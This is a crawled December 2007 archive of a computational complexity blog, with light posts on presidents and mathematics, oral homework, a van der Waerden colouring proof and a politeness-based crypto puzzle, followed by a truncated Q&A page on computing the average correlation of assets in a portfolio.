Contributed by: A. Garbaruk, M. Shur and M. Strelets — New Technologies and Services LLC (NTS) and St.-Petersburg State Polytechnic University | 2020-10-20 12:03:34 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 12, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7311084866523743, "perplexity": 1884.4865903540176}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-45/segments/1603107872686.18/warc/CC-MAIN-20201020105000-20201020135000-00716.warc.gz"} |
https://blog.computationalcomplexity.org/2007/12/?m=0 | ## Monday, December 31, 2007
### Presidential Math
On Jan 3 is the Iowa Caucus, the first contest (or something) in the US Presidential race. The question arises: Which presidents knew the most mathematics? The question has several answers depending on how you define "know" and "mathematics". Rather than answer it, I'll list a few who know some mathematics.
1. Jimmy Carter (President 1976-1980, lost re-election) was trained as a Nuclear Engineer, so he knew some math a long time before becoming president. (I do not know if he ever actually had a job as an Engineer.) I doubt he knew much when he was president.
2. Herbert Hoover (President 1928-1932, lost re-election) was a Mining Engineer and actually did it for a while and was a success. Even so, I doubt he know much when he was president.
3. James Garfield (President 1881-1881, he was assassinated) Had a classical education and came up with a new proof of the Pythagorean Theorem
4. Thomas Jefferson (President 1801-1809) had a classical education and is regarded by historians as being a brilliant man. He invented a Crypto system in 1795. Note that this is only 6 years before becoming president, so he surely knew some math when he was president.
5. Misc: Lyndon B. Johnson was a high school math teacher, Ulysses S. Grant wanted to me one but became president instead. George Washington was a surveyor which needs some math. Many of the early presidents had classical educations which would include Euclid. And lastly, Warren G. Harding got an early draft of Van Der Waerden's theorem, conjectured the polynomial VDW, but was only able to proof the quadratic case (not surprising—he is known as one of our dumber presidents).
I would guess that Jimmy Carter and Herbert Hoover knew more math (there was far more to know) then Jefferson, but Jefferson knew more as a percent of what there was to know, then Carter and Hoover. Garfield, while quite smart, probably does not rank in either category. I don't think any of the current major candidates were trained in Math. Hillary Clinton, Barack Obama, John Edwards, Rudy Guilliani, and Mitt Romney were all trained as lawyers. Rudy Guillian and Mitt Romney have been businessman as well. Huckabee was a minister, McCain was a soldier. I do not know what they majored in as undergrads.
## Thursday, December 27, 2007
### Oral Homework
This fall in my graduate complexity courses 5/11 of the HW were group HWs. This means that
1. The students are in groups of 3 or 4. The groups are self-selected and permanent (with some minor changes if need be).
2. The groups do the HW together.
3. They are allowed to use the web, other students, me, other profs.
4. The HW is not handed in–they get an Oral Exam on it.
5. The HW is usually "read this paper and explain this proof to me."
In my graduate course in Complexity Theory which I just finished teaching 5 out of the 11 HWs were Oral HW. Here is what they were basically:
1. Savitch's theorem and Immerman-Szelepcsenyi Theorem.
2. Show that VC and HAM are NPC.
3. E(X+Y)=E(X)+E(Y), Markov, Chebyshev, Chernoff
4. Reg Exp with squaring NOT in P.
5. Matrix Group Problem in AM. (Babai's paper "Trading Group Theory for Randomness").
1. The students learned ALOT by doing this. They learned the material in the paper, they learned how to read a paper, and they learned how to work together. (Will all of these lessons stick?)
2. Some proofs are better done on your own than having a professor tell you them (HAM cycle NPC comes to mind). This is a way to make them learn those theorems without me having to teach it.
3. Some theorems are needed for the course, but are not really part of the course (Chernoff Bounds come to mind). The Oral HW makes them learn that.
4. This was a graduate course in theory so the students were interested and not too far apart in ability. This would NOT work in an ugrad course if either of those were false.
5. This course only had 19 students in it, so was easy enough to administer.
So the upshot–It worked! I recommend it for small graduate classes.
## Monday, December 24, 2007
### The Twelve Days of Tenure
On the twelfth glance at her case, what did we all see:
12 people asking her questions in her office, 11 times taught Intro Programming, 10 journal articles, 9 pieces of software, 8 book chapters, 7 invited panels, 6 submitted articles, 5 mil-lion bucks!, 4 invited talks, 3 students, 2 post-docs, and a degree from MIT.
NOTE: The 12 days of Christmas is (easily) the most satirized song ever. I used to maintain a website of satires of it here but it was too hard to keep up? Why? Because anyone can write one. I wrote the one above in about 10 minutes during a faculty meeting to decide someone's Tenure case.
## Friday, December 21, 2007
Bill Gasarch is on vacation and he had given me (Lance) a collection of posts for me to post in his absence. But then I got email from Tal Rabin who wants to get the word out about the Women in Theory workshop to be held in Princeton in June. Done. Now back to your regularly scheduled post from Bill.
I don't usually watch Deal/No Deal. I like some of the interesting math or dilemmas it brings up, but the show itself is monotonous. As Host Howie Mandel himself says "we don't ask you a bunch of trivia questions, we just ask you one question: DEAL or NO DEAL!" Here is a scenario I saw recently where I thought the contestant made the obviously wrong choice.
1. There are two numbers left on the board: $1000 and$200,000.
2. She is offered a $110,000 deal. 3. She has mentioned that$110,000 is about 5 times her salary (so this amount of money would make a huge difference in her life).
4. Usually in this show you have the audience yelling NO DEAL! NO DEAL!' This time the audience, including her mother, her sister, and some friends, were yelling TAKE THE DEAL! TAKE THE DEAL!'. While this is not a reason to take the deal, note that the decision to say NO DEAL is NOT a caught up in the moment' sort of thing.
She DID NOT take the deal. We should judge if this was a good or bad decision NOT based on the final outcome (which I won't tell you). Here is why I think it was the wrong choice. Consider the following scenarios:
1. If she takes the deal, the worst case is that she gets $110,00 instead of$200,000.
2. If she rejects the deal, the worst case is that she gets $1000 instead of$110,000.
The first one is not-so-bad. The second is really really bad. Is there a rational argument for her decision? I could not come up with one, but maybe I'm just risk-averse.
## Wednesday, December 19, 2007
### More on VDW over the Reals
Some of the comments made on the posts on this post on a VDW over the Reals been very enlightening to me about some math questions. In THIS post I will reiterate them to clarify them for myself, and hopefully for you.
I had claimed that the proof that if you 2-color R you get a monochromatic 3-AP USED properties of R- notably that the midpoint of two elements of R is an element of R. Someone named ANONYMOUS (who would have impressed me if I knew who she was) left a comment pointed out that the proof works over N as well. THIS IS CORRECT:
If you 2-color {1,...,9} then there will be a mono 3-AP. Just look at {3,5,7}. Two of them are the same color.
1. If 3,5 are RED then either 1 is RED and we're done, 4 is RED and we're done, or 7 is RED and we're done, or 1,4,7 are all BLUE and we're done.
2. If 5,7 are RED then either 3 is RED and we're done, or 6 is RED and we're done, or 9 is RED and we're done, or 3,6,9 are all BLUE, and we're done.
3. If 3,7 are RED then either 1 is RED and we're done, or 5 is RED and we're done, or 9 is RED and we're done, or 1,5,9 are BLUE and we're done.
This is INTERESTING (at least to me) since VDW(3,2)=9 is TRUE and this is a nice proof that VDW(3,2)≤ 9. (Its easy to show VDW(3,2)≠ 8: take the coloring RRBBRRBB.) I had asked if VDWr may have an easier proof then VDW. Andy D (Andy Drucker who has his own Blog) pointed out that this is unlikely since there is an easy proof that VDWR--> VDW. Does this make VDWr more interesting or less interesting? Both!
1. More Interesting: If VDWr is proven true using analysis or logic, then we get a NEW proof of VDW!
2. Less Interesting: Since it is unlikely to get a new proof of VDW, it is unlikely that there is a proof of VDWr using analysis.
## Friday, December 14, 2007
### Complexity Theory Class Drinking Game
Complexity Theory Class Drinking Game
1. Whenever a complexity class is defined that has zero natural problems in it, take one drink.
2. Whenever a class is defined that has one natural problem in it, take two drinks.
3. Whenever you are asked to vote on whether or not a problem is natural, take three drinks.
4. Whenever a mistake is made that can be corrected during that class, take one drink.
5. Whenever a mistake is made that can be corrected during the next class, take two drinks.
6. Whenever a mistake is made that cannot be corrected because it's just wrong, take three drinks.
7. Whenever a probability is amplified, refill your cups since a class with zero or one natural problems in it is on its way.
8. Whenever the instructor says that a theorem has an application, take a drink.
9. Whenever the instructor says that a theorem has an application, and it actually does, take two drinks.
10. Whenever the instructor says that a theorem has an application outside of theory, take two drinks.
11. Whenever the instructor says that a theorem has an application outside of theory, and it really does, take four drinks.
## Monday, December 10, 2007
### An ill define question inspired by that HS question
RECALL the problem from my last post:
Each point in the plane is colored either red or green. Let ABC be a fixed triangle. Prove that there is a triangle DEF in the plane such that DEF is similar to ABC and the vertices of DEF all have the same color.
The answers to all of the problems on the exam are posted See here for the webpage for the competition. The problem above is problem 5.
One of the key observations needed to solve the problem is the following theorem:
If the reals are 2-colored then there exists 3 points that are the same color that are equally spaced.
Before you can say VDW theorem!' or Roth's Theorem!' or Szemeredi's theorem for k=3 !' realize that this was an exam for High School Students who would not know such thing. And indeed there is an easier proof that a HS student could (and in fact some did) use:
Let a,b both be RED. If (a+b)/2 is RED then a,(a+b)/2,b works. If 2b-a is RED then a,b,2b-a works. If 2a-b is RED then 2a-b,a,b works. IF none of these hold then 2a-b,(a+b)/2,2b-a are all BLUE and that works.
By VDW the following, which we denote VDWR, is true by just restricting the coloring to N:
VDWR: For any k,c, for any c-coloring of R (yes R) there exists a monochromatic arithmetic progression of length k.
This raises the following ill-defined question:
Is there a proof of VDWR that is EASIER than using VDW's theorem. Or at least different- perhaps using properties of the reals (the case of c=2, k=3 used that the midpoint of two reals is always a real).
## Friday, December 07, 2007
I was assigned to grade the following problem from the Maryland Math Olympiad from 2007 (for High School Students):
Each point in the plane is colored either red or green. Let ABC be a fixed triangle. Prove that there is a triangle DEF in the plane such that DEF is similar to ABC and the vertices of DEF all have the same color.
I think I was assigned to grade it since it looks like the kind of problem I would make up, even though I didn't. It was problem 5 (out of 5) and hence it was what we thought was the hardest problem. About 100 people tried it, and less than 5 got it right, and less than 10 got partial credit (and they didn't get much).
All the vertices are red because I can make them whatever color I want. I can also write at a 30 degree angle to the bottom of this paper if thats what I feel like doing at the moment. Just like 2+2=5 if thats what my math teacher says. Math is pretty subjective anyway. (NOTE- this was written at a 30 degree angle.)
I like to think that we live in a world where points are not judged by their color, but by the content of their character. Color should be irrelevant in the the plane. To prove that there exists a group of points where only one color is acceptable is a reprehensible act of bigotry and discrimination.
Were they serious? Hard to say, but I would guess the first one might have been but the second one was not.
## Wednesday, December 05, 2007
### Crypto problem inspired by politness
The following happened- a common event, but it inspired a crypto question (probably already known and answered) but I would like your comments or pointer to what is known.
My mother-in-law Margie and her sister Posy had the following conversation:
POSY: Let me treat the lunch.
MARGIE: No, we should pay half.
POSY: No, I want to treat.
MARGIE: No, I insist.
This went on for quite a while. The question is NOT how to avoid infinite loops- my solution to that is easy- if someone offers to treat, I say YES and if someone offers to pay 1/2 I say YES, not because I'm cheap, but to avoid infinite loops.
Here is the question. It is not clear if Posy really wanted to treat lunch, or is just being polite. Its not clear if Margie really wants to pay half or is just being polite. SO, is their some protocol where the probability of both getting they DO NOT WANT is small (or both getting what they want is large), and the other one does not find out what they really want. Here is an attempt which does not work.
1. Margie has a coin. Margies coin is OFFER with prob p, and DO NOT OFFER with prob 1-p. If she really wants to make the offer to treat then p is large, else p is small. Could be p=3/4 or p=1/4 for examples.
2. Posy has a similar coin.
3. Margie flips, Posy Flips.
4. If Margie's coin says OFFER, than make the offer. If not the don't.
5. Same with Posy.
The bad scenarios- that they both get what they don't want, has prob 1/8. However, if they do this alot then Margie and Posy will both have a good idea of what the other really wants.
In solutions you may offer or point me to we can of course assume access to random coins, and that neither Posy nor Margie can factor or take discrete log. | 2023-03-28 01:34:35 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6196144819259644, "perplexity": 1255.5928942213968}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296948756.99/warc/CC-MAIN-20230328011555-20230328041555-00362.warc.gz"} |
https://math.stackexchange.com/questions/2439928/extended-euclidean-algorithm-a-remainder-becomes-zero | # Extended Euclidean Algorithm: a remainder becomes zero
When working on the Chinese Remainder Theorem, I have stumbled upon this system of linear congruences. $$x\equiv2 \mbox{ mod 3}$$ $$x\equiv3 \mbox{ mod 5}$$ $$x\equiv4 \mbox{ mod 11}$$ $$x\equiv5 \mbox{ mod 16}$$
Problem I am having is, when I apply the extended Euclidean Algorithm to find $M_2$ such that $N_2.M_2\equiv1\mbox{ mod }n_2$ (where $n_2=5$ and $N_2=3\times11\times16=528$ and $M_3$ being the modular inverse of 528 under $\mbox{ mod }5$), I reach the following.
$$528=105\times5+3\\ 105=35\times3+0$$ What I don't understand is how to go from this point forth. This question might have been repeated somewhere in this stack exchange. But I am unable to find any such. That is why I have chosen to post this. Thanks n advance.
• @GAVD Thanks for making it look better. :) – Romeo Sierra Sep 22 '17 at 5:48
• $528$ is not $105\times 5+30$. – Angina Seng Sep 22 '17 at 5:49
• Corrected. It was a typo.. – Romeo Sierra Sep 22 '17 at 5:52
• Surely, the next stage in your EEE should be $5-1\times 3=2$? – Angina Seng Sep 22 '17 at 5:54
• @LordSharktheUnknown Didn't get you. Can you please elaborate? – Romeo Sierra Sep 22 '17 at 7:11
So the problem here is I am choosing the wrong input to the second iteration. I am choosing 105, which is the quotient of $528\div5$ as the dividend, whereas it should actually be 5, which is the divider of the previous iteration. So it actually should be
$$528=105\times5+3\\ 5=1\times3+2\\ 3=1\times2+1$$ and that's it. Thanks to @N.F.Taussig and @LordSharktheUnknown. | 2020-04-09 08:46:41 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7858885526657104, "perplexity": 495.0748315311345}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-16/segments/1585371830894.88/warc/CC-MAIN-20200409055849-20200409090349-00093.warc.gz"} |
https://www.physicsforums.com/threads/aerodynamic-design-for-cars.11920/ | # Aerodynamic design for cars
1. Jan 2, 2004
### bracey
What are all the advantages of good aerodynamic design and how can these be proved mathematically?
For example what is the difference between a truck with a wind deflector and the same truck without the wind deflector?
2. Jan 2, 2004
### Staff: Mentor
I'm sure the designers do a computational fluid dynamic analysis, but the easiest way to prove it is with a wind tunnel. Aerodynamics plays a significant role in top speed and fuel economy.
3. Jan 11, 2004
### Sudden_strike88
Well I have been interested in aerodynamics a long time now, and I can say some things that are basically wrong with some vehicles:
*trucks and buses have flat fronts wich propably make 100kgs drag at 100kmph
*cars have spoilers because the designers are DUMB and make the shape of a car like an airfoil (most common design) and then struggle to keep the wheels on the ground with spoilers
*cars having a flat rear that automatically generates a low pressure. Though it collapses to create a vortex, that is still a waste!
The list can go on if you just look carefully...
4. Jan 12, 2004
### NateTG
You should distinguish between spoilers and wings. Spoilers act to break lift, and can make cars more aerodynamic by breaking down the vortex/vacuum at the tail.
Wings generate lift, on cars this is typically negative lift, and are used essentially only on racecars.
drag is typically measured in Newtons, or pounds. Kilograms are a unit of mass.
Less drag means higher fuel efficiency, and a potentially higer top speed.
Using wings for downforce means that cars can accelerate more because there is more friction between the tires and the road. At speed, Formula 1 cars could drive upside down because the downforce is larger than the weight of the car.
In practice, serious interest in aerodyamics on cars is mostly in the context of racing.
A second environment where fuel economy is important is trucking, but in that environment the need is for inexpensive aerodynamic improvements.
5. Jan 21, 2004
### rdt2
Good aerodynamic design reduces drag which improves fuel economy. The mathematics of aerodynamics is well known and the best overall shape (from a low-drag point of view) is called a Rankine Oval. However, in the real world, you have to compromise good aerodynamics with the need to fit in the engine, passengers, loadspace, etc and the cost of manufacture. An excellent example of a good compromise is the Citroen Zsara Picasso - almost a perfect Rankine Oval.
One of the aims in streamlining is to reduce the vortices that dissipate energy. These tend to occur when you get sharp re-entrant corners and flat surfaces. However, the frontal shape of the vehicle is not too much of a problem because it pushes a wedge of air before it, effectively streamlining it. And trucks tend to be slim relative to their length - which also helps. More important is the back - a flat back drags a lot of turbulent air behind it and should really be streamlined. However this isn't practical with large trucks because it would compromise the shape of the loadspace. Streamlining the turbulent re-entrant corner between the cab and the box body is a cheap and useful addition.
Of course, none of this is to do with roadholding. To improve roadholding using aerodynamics is possible (e.g ground effect in F1 cars) but you may have to compromise on drag. All engineering is a compromise.
Cheers,
ron.
6. Dec 15, 2006
### danscope
Hi, Many excellent responses. Take a look at Buckminster Fuller's
DYMAXION CAR. This as an excellent design , ahead of it's time.
A three wheeler with a tear drop body, and low sprung weight suspension, which needed a front wheel drive system like we see everywhere today.
Remarkable for 1935. And it did all this with a 90 HP flathead V-8.
I can only imagine what Bucky would have done with a 2.5Lsubaru and carbonfibre.
Best regards, Dan
7. Dec 16, 2006
### Danger
I'm glad that you're doing it, though, 'cause they're good ones.
8. Dec 16, 2006
### Karana
I know this is off thread but I'm trying to get a hold of Danger. Can you PM me please?
9. Dec 16, 2006
### Danger
Done, and nice to meet you.
10. Dec 18, 2006
### danscope
Hi, Thanks for the reply. Nice to meet you.
Enjoy your Holidays, and Best regards, Dan
11. Dec 18, 2006
### Danger
Likewise.
12. Dec 19, 2006
### danscope
Hi, You should see my design for a three wheeled flying motorcycle.
A section of glider fuselage with one wheel in back and two wheels forward,
tandem seating, and a modest 2 cycle engine for power. Rotax water cooled would be ideal. 65mph ground speed.
Flying package in the form of a Burt Rutan "Long-EZ". 150HP swept wing with tip rudders and an canard wing forward(detatchable). Would like to see this as a home-built with factory parts( wings, fuselage skins, tube chassis ..)
Under $40,000, 175Kts cruise, land 60kts,1200 nm range. Just on paper for now. Best regards, Dan 13. Dec 19, 2006 ### 3trQN Sorry, couldn't help but picture the 2CV as an anti-example of aerodynamic design. :rofl: 14. Dec 19, 2006 ### Danger That actually sounds pretty reasonable. I assume that you'd have to stow the wings along the sides while ground-bound. Detachable, or folding? 15. Dec 19, 2006 ### danscope Hi Nice of you to reply, Here is an extended description of the design. Bear in mind:all of the expensive components "Stay" at the airport. We don't want some fool running into our expensive wings, engins, propellers etc. They stay safely where they should must needs be. Here is the picture: ...................... I have had an interest in refining a design for a roadable aircraft for some years. Here is an essay on that possibility....as a three wheeled flying motorcycle. May I say that I have been following this particular subject for some time. After many years of design work, I shall say that the only things required for the advance of roadable aircraft are a "reasonable" aproach by government,both state and federal, in regard to experimental aircraft. One of the first approaches to an affordable roadable aircraft will be a flying motorcycle. The reason for this is that once you call something a "Car", you open a can of worms with regard to regulation. My design offers a reasonable and practical work around. The three wheeled motorcycle. It will be a two passenger, tandem seating (one front, one back) section of fuselage similar to a sail plane, with a bubble top canopy, and having "TWO WHEELS IN FRONT" and a single rear drive wheel. This is a stable road configuration, as opposed to the single front wheel which can easily roll over in a turn, especially a braking turn. This fact considered, shall we look at the flying configuration. This part is a well known and applauded design plan by Burt Rutan called a "Long - EZ" . This has been flying for well over 20 years and is a superb flying platform, stable, efficient, stall resistant and having an excellent glide ratio, being one of the more slippery designs out there. Just go to Oshkosh for the fly-in , and you will see these aircraft in surprising numbers, and they are all hand built. One of the interesting things about the design is that the main wing spar which carries 90 % of the load is located behind the rear seat. This most interesting feature allows for the convenient sectioning of the forward fuselage from the main wing-landing gear-engine- propeller-fuel tanks section which I shall call the "flying package". This also includes the forward wing, known as the "Cannard" wing, which is removed and stays with the flying package. Don't be afraid. Sailplanes take the wing off each day with a couple of secured bolts. Part of a good design. The landing gear remains fixed, for economy and simplicity,although there are many examples of canard aircraft with the luxury of retractable gear. You can gain another 20 knots or so. But....you're going to PAY!!! The forward landing gear is a single retractable nose wheel, light and simple which retracts with a hand lever. The "Road Wheels" do "Road Work". This is important in design considerations. Aircraft wheels are light, thin, and have no tread, and work marvelously as aircraft wheels. They are not welcomed on the street or highway and do not last in that purpose. They are thin. Simple. Do not use aircraft tires on the road. This design has two motorcycle wheels with disc brakes which may be coupled or released from an internal torsion bar suspenion, saving weight, drag, and locating some suspension weight further aft, a good thing. rs come off; the wheels come down and get pre-loaded to bear the vehicle weight. Then the wheel covers are re-secured in reverse to become fenders. The nose wheel is now retracted,and gear door locked closed. When on the parking tarmac, we secure the wing in it's tie-down configuration and then deploy a rear support strut, just under the engine support. This will bear much of the weight ( nearly as much as the road vehicle ) and keep the flying package from tilting over backwards , and pranging an expensive propeller. I should perhaps mention that we don't ever want to go down the street with expensive and delicate aircraft parts and compete with trucks, suv's and$50 cars with bad drivers. My design leaves all of this at the airport, and it is through this rational approach that we will agin have need of and praise our local airport. You will never have a situation where you land on highways and streets. This is non-sense and shall never be accepted by the majority. I am not opposed to emergency utilization of highways for landing and....there are ways to do this safely. Ask me later.
Now, as to the road vehicle. As the aircraft sits at tie-down, with the support strut in place, we can deploy the front suspension. This is a Sikorsky design (circa 1930 ) and well proven as anyone who has seen a catalina flying boat or an F8 Crusader . The fuselage covers for the wheels are removed and the wheels come out, and with the aid of a small speed wrench (a crank )
the weight of the road assembly is recieved.... a "Pre-loading" of the suspension. The covers that come off are then secured back onto the body and serve as fenders (it pleases the DOT to have fenders and sort of protects the canopy.) Clever design.
Next, the rear drive wheel is deployed by the speed wrench, allowing it to touch ground and pre-load the weight of the road vehicle.It utilizes a shaft drive. Now, we can release the electical (multi-pin amphenol connector) and flex tubing for the Pitot tube ( air speed indicator..you see.) The mechanical connections for flaps, elevons rudders,brakes,throttle,mixture control etc are touch-based mechanical designs, thought out long ago by such visionaries as Molt Taylor. It comprises a pad, like a hockey puck which lines up with another like it. They push against each other. Right aileron against left aileron,
rudder against rudder, throttle belcrank, mixture control etc.
It's not rocket science,folks. A high school kid can do it. This would be all possible in about ten minutes or less. And perhaps taking more time for re-assembly for pre-flight. Still with me? Now, we can remove the four bolts and securing pins , and separate road vehicle . The road vehicle is powered by a "separate engine". After all, aircraft engines are somewhat expensive,and you only get 2000 hrs before major overhaul; although there are some extraordinary designs for automotive engines with forged crank shafts , different cams, and of course a cog-belt reduction gear to reduce propeller RPM from that of the V-8...usually from
4100 rpm down to 2150 where the propeller is most efficient. This has been done, and is done every day. They even have a 3 litre Subaru flying.
The point is that it is fool hardy to waste the flying hours that you get out of a 25,000 dollar aircraft engine on road travel, when we can get an inexpensive 2 cycle motor cycle engine to do the job much better, with popular parts anywhere, and other advantages. And less emissions.
The canard wing (as mentioned before) is removed with two bolts and securing pins, and is secured to the wing. All of the expensive stuff stays at the flying field. Simple. Don't expose your aircraft to the street.
The road vehicle is simple, light enough and ,if necessary, replacable.
The fuselage,in fact has been proven to enjoy a better than 30 MPH crash rating. Substantially better than a bare motocycle in which YOU are
"The Roll Cage". In performance, I should be satisfied with a road speed of 60 MPH, and reasonable braking performance.
The aircraft is flown with a side-arm stick, and doesn't interfere at all with the steering wheel. Brake pedal is above the rudder pedal on the right, and the clutch is above the left. And if you can't drive stick, you have no business flying. Now...... is this for "Everyone" ???? Well, certainly not for those with a reckless driving record. The "Privilige" of flying any aircraft remains with those who prove themselves competent to earn an aviation licence, and justly so. What has kept the general public from embracing general aviation untill now has been the extraordinary costs (defrayed by home building),
The difficulties of navigation ( now demystified by the advantages and miniaturization of GPS navigation, and glass cockpit displays enabling you to land in the fog anywhere...it's already here.)
The required talent in sculpting an laminar air-flow wing from polyfoam ,s-glass and epoxy rein and graphite fibre...(this can be satisfied by a manufacturer in an autoclave ( a heated mold which produces a perfect wing
in hours ,not months...Perfect! )
And the will and confidence to fly. This has been satidfied under your nose by a generation of kids who can fly an helicoptor on their computer screen at the age of twelve. Yes...things have changed....a little bit. In fact, you can learn to fly on your computer . It's done all the time. You still need to go to school
with a certified flight instructor. But it will be worth while. Having your transportation with you at all times is an idea whose time has come.
What do we need??????
Federal and state co-operation.
And perhaps, a sort of race. Really.. a competition.
All forms of racing have reched the envelope. Formula One, Nascar, NHRA
Drags, USSC, unlimited air racing..you name them. They are all "Aberations of transportation" and presently do little for the advancement of our own transportation . But let's consider:
A race between point A and B on the road with two people on board and a modest payload....say a bag of golf clubs and an overnight case for each person. Extra grand prix points for payload. Upon reaching point B, the vehicle
prepares for flight. No speed required here. Half hour should be reasonable.
No pit crew allowed or required. Then , a tech inspection....half hour.
Then, pre-flight and to point C, for instance, Barnestable,Cape Cod to
Nantucket; land, re-set as a road vehicle, go to town and get a tee shirt and a hamburger, and return, reconfigure for flight, fly to Provincetown,fuel up,stretch your legs and return to Barnestable. Now, THERE is a competition I should like to see on ESPN!!! After 5 years of competition, we shall have isolated a design worthy of production "As A Kit ", so as to make the idea affordable and possible. A kit could be made for under 15,000 dollars, and then powered how so ever you can afford. As of today, our GA fleet is getting so long in the tooth that we are on the point of replacing half of them anyway, and we haven't even mentioned the corrosion problems associated with alluminum skinned aircraft. By the way; fibre glass and epoxy aircraft don't rust. More importantly, you are the manufacturer, and responsible party.
This has been the hallmark of the EAA for many years. They have a good record for quality, high preformance aircraft, and as a community, serve themselves well in all respects.
As to the performance specifications we may see with this design :
Typical performance charactaristic for such aircraft are :
Take-off velocity----60 knts
landing vel -- 55
cruise vel --- 160kts and better
top vel --- 190 and better
range --- 800 NM and better ( just how long do you want to sit in one place anyway).
Glide ratio ---10 to 1 and better, which means that, unlike some of the hair brained ideas lately, this aircraft, in an engine-out situation can linger in the air a damned sight longer than most anything else out there, and for me, a keen consideration in anything I should fly. I dislike copters...too many disposable parts. ANY AIRCRAFT WHICH LOSES POWER SHOULD STILL FLY AND CONTINUE TO FLY. tHIS IS VERY IMPORTANT. iF i AM AT 5000 FEET, I
SHOULD EXPECT TO GLIDE FOR 10 MILES ANYWAY.
Also, with the advantages of an onboard nav computer with an excellent database, you can hit a function key, and the computer will tell you where to steer and make a best decision on where to put down in an emergency.
Some comfort there. There also exists an balistic recovery parachute which will safely bring you down at the push of a button. REALITY, not SF.
Well, thank you for your patience and persistence in reading my essay. | 2017-05-22 17:41:56 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.3120492100715637, "perplexity": 3405.849206790678}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-22/segments/1495463605485.49/warc/CC-MAIN-20170522171016-20170522191016-00263.warc.gz"} |
https://quant.stackexchange.com/questions/33656/what-is-the-total-correlation-between-assets-in-a-portfolio/33660 | # What is the total correlation between assets in a portfolio?
Suppose I have portfolio with 10 assets, each one of them with a weight of 10% from the total portfolio (equally weighted).
It's well known how to measure from historical prices->returns a variance-co-variance matrix. And from here to have portfolio's Variance and STD (and later on this is useful for VaR calculation etc.)
However it's also useful to know the regular correlation (Pearson correlation coefficient) between each pair of assets.
The question is: What is the correct measure to some kind of "Total" or "Average" correlation between all the assets in a portfolio?
Naively because it's equally weighted portfolio I just took simple arithmetic average of all pairwise correlation coefficients...
This is indeed an interesting question.
According to this website, a paper by Goldman Sachs [Tierens and Anadu (2004)] proposes three alternative methods for estimating average stock correlations:
1. Calculate a full correlation matrix, weighting its elements in line with the weight of the corresponding stocks in the portfolio/index, and excluding correlations between the stock and itself (i.e. the diagonal elements of the correlation matrix)
2. Proxy average correlation using only individual stock volatilities and that of the portfolio/index as a whole
3. Refine 2. by reference to the ratio of index to average stock volatility
You can find more details on the abovementioned website. Unfortunately I haven't found the original paper, but if somebody provides a link in the comments I will update the post.
So to answer your question about a "correct" method: As always there is no "god-given" way how to model statistical phenomena, there are always tradeoffs with certain characteristics which are helpful in some situations but less so in others. Some important characteristics and tradeoffs for the different methods can be found in section 3 (Comments) of the abovementioned website.
I just want to add to vonjd's answer some info on the comparison of the 3 methods. This is too big for a comment so I'm posting as a separate answer but please upvote his answer, not mine.
# Do the differences in methodologies matter in practice?
